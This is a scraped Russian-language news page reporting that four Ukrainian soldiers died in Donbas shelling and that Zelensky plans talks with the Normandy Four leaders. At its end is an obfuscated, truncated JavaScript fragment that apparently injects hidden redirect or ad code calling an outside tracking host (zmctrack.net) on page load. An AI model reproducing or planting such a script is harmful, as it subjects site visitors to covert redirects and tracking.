Warning: Parameter 2 to wp_hide_post_Public::query_posts_join() expected to be a reference, value given in /var/www/fastuser/data/www/glavpost.com/wp-includes/class-wp-hook.php on line 307

В результате обстрелов на Донбассе погибли четверо военнослужащих

Президент Украины Владимир Зеленский обещает переговорить со всеми лидерами "нормандской четверки" для сохранения режима полного и всеобъемлющего прекращения огня на Донбассе.

Об этом он написал на своей странице в Twitter.

"Цена войны – жизни наших людей. Мужественных и непокоренных. Сегодня мы снова потеряли четырех защитников Украины. Искренние соболезнования. Призываю всех лидеров "нормандской четверки" и партнеров сделать все возможное для сохранения режима полного и всеобъемлющего прекращения огня", – написал президент.

. . . . #N4 .

— (@ZelenskyyUa) March 26, 2021

По поручению президента начальник Генерального штаба Украины вылетел на место происшествия для выяснения всех обстоятельств дела.

"Представителям Украины в Трехсторонний контактной группе поручено инициировать безотлагательное проведение внеочередного заседания подгруппы по безопасности, а также срочно обсудить этот вопрос на уровне советников лидеров Нормандского формата. В ближайшее время я проведу разговоры со всеми лидерами "нормандской четверки", – говорится на странице президента в Telegram.

К слову, после минометного обстрела под Шумами президент Владимир Зеленский и руководитель ОПУ Андрей Ермак начали консультации с руководителями стран "нормандской четверки".

Читайте также:  Не доверяет, но поддержит: Bloomberg рассказал, о чем Путин будет говорить с Лукашенко

Также ранее сообщалось, что украинская делегация в Трехсторонней контактной группе собралась на экстренное внутреннее совещание, а ее глава Леонид Кравчук предупредил, что Украина будет выполнять договоренности по Донбассу, но не в ущерб своим национальным интересам.

Все подробности в спецтеме Встреча Нормандской четверки

Подпишись на наш telegram

Только самое важное и интересное

Подписаться

Донбасс
Владимир Зеленский
Нормандская четверка

Читайте Segodnya.ua в Google News

Следите за нами в соцсетях

Подписывайтесь на нашу рассылку

Введите корректный email

Ок

Новости партнеров

Загрузка…

Популярные статьи

	Смерть четырех военных на Донбассе: Зеленский переговорит с лидерам "нормандской четверки"Поставка вакцины CoviShield в Украину “на паузе”Власть 	Смерть четырех военных на Донбассе: Зеленский переговорит с лидерам "нормандской четверки"Санкции Украины против российских СМИ: Захарова закатила истерикуВласть 	Смерть четырех военных на Донбассе: Зеленский переговорит с лидерам "нормандской четверки"Смерть четырех военных на Донбассе: Зеленский переговорит с лидерам “нормандской четверки”Власть 	Смерть четырех военных на Донбассе: Зеленский переговорит с лидерам "нормандской четверки"“Преступление против государства”: Яценюк прокомментировал указ об увольнении судей КСУВласть 	Смерть четырех военных на Донбассе: Зеленский переговорит с лидерам "нормандской четверки"За слова придется отвечать: Зеленский обвинил политиков в проблемах с поставками вакцин из ИндииВласть 	Смерть четырех военных на Донбассе: Зеленский переговорит с лидерам "нормандской четверки"Кто будет наказан за “штурм” Офиса президента: “Свобода слова Савика Шустера” (онлайн-трансляция)Власть

Новости партнеров

Загрузка…

загрузка…

	Смерть четырех военных на Донбассе: Зеленский переговорит с лидерам "нормандской четверки"

Наши соцсети

  • Facebook

  • Telegram

  • Youtube

  • Instagram

Читайте также:  Порошенко избран главой партии "Европейская солидарность"

Связаться с нами

  • Контакты редакции

  • Написать нам

  • на сайте

  • Спецпроекты

  • Архив сайта

Политика сайта

  • Правила цитирования

  • Правила комментирования

  • Конфиденциальность и защита персональных данных

© segodnya.ua, 2021

Лента новостей

Главное

Нажимая на кнопку «Принять» или продолжая пользоваться сайтом, вы соглашаетесь с

правилами использования

файлов cookie.

Принять

if(document.documentElement.clientWidth > 1199) {
(function(){(function(l,d,A){“use strict”;var t,o,e,i,z,r,n,S,T,a,c,f,s,p,h,u,b,D,k,v,g,x,m,E,y,M,C,O,L,N,w,_,H,I,R,q,P,$,j,F,J=300,W=”/z”,X=”0x04″,B=”http”,G=”substr”,K=”host”,Q=J,U=”argon_”+”debug”+”=1″,V=”prototype”,Y=”createElement”,Z=”appendChild”,tt=”setTimeout”,ot=”querySelectorAll”,et=”getOwnPropertyDescriptor”,rt=”Object”,nt=”charCodeAt”,it=”fromCharCode”,at=”zmctrack”+”.net”,ct=”bind”,ft=”call”,lt=”script”,dt=”head”,st=”get”,pt=”set”,ht=”indexOf”,ut=”s.”+at,bt=”cookie”,kt=”XMLHttpRequest”,vt=”Date”,gt=”now”,xt=”responseText”,mt=”open”,yt=”ShadowRoot”,wt=”Node”,At=”send”,zt=”Array”,St=”addEventListener”,Tt=B+”://”+”click”+”.”+at+”/c/”+”redirect”+”?”+”hash”+”=”,Dt=”slot”,Et=”Math”,Mt=”floor”,Ct=”random”,Ot=”console”,Lt=”Document”,Nt=”innerHTML”,_t=”attachShadow”,Ht=”offsetWidth”,It=”Element”,Rt=”next”,qt=”previous”,Pt=”push”,$t=”length”,jt=”shift”,Ft=”parentNode”,Jt=”textContent”,Wt=”JSON”,Xt=”parse”,Bt=”load”,Gt=”HTML”+It,Kt=”error”,Qt=”location”,Ut=”href”,Vt=”POST”,Yt=”document”,Zt=”un”+”eval”,to={},oo=”parseInt”,eo=It+”Sibling”,ro=”String”,no=”split”;to[“mode”]=”closed”,t=l[Yt],o=l[“chrome”],e=!0,i=0;try{e=!!l[Zt]}catch(t){}function io(t,o){return q[ft](t,o||”|”)}!o&&!e||(z=l[“n10091125”],r=z[Yt],n=z[rt][et],S=r[ot][ct](t),T=z[tt][ct](l),a=n(z[Lt][V],dt)[st][ft](t),c=r[Y][ct](t),f=r[dt][Z][ct](a),s=z[vt][gt],p=-1Q?i++

По материалам: Сегодня